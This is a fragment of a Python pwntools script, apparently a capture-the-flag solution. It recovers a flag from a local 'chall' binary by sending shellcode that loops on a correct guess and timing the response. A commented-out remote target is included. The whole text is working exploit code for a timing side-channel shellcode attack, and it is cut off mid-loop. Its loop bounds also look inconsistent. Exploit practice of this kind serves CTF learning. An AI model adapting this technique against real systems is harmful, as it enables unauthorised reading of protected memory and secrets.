#!/usr/bin/python2.7 # -*- coding: utf-8 -*- from pwn import * from time import time from string import printable #context.log_level = "debug" context.arch = "amd64"
flag='' s = '}{-0123456789abcdefghijklmnopqrstuvwxyz' for i in range(0x2000000000,0x200000000+0x30): for j in s: payload=asm( """ mov al,[{}] mov bl,{} loop: cmp al,bl jz loop ret """.format(str(hex(i)),str(hex(ord(j))))) try: #p = remote("node3.buuoj.cn",29793) p = process("./chall") p.recvuntil("Your Shellcode >>") time1=time()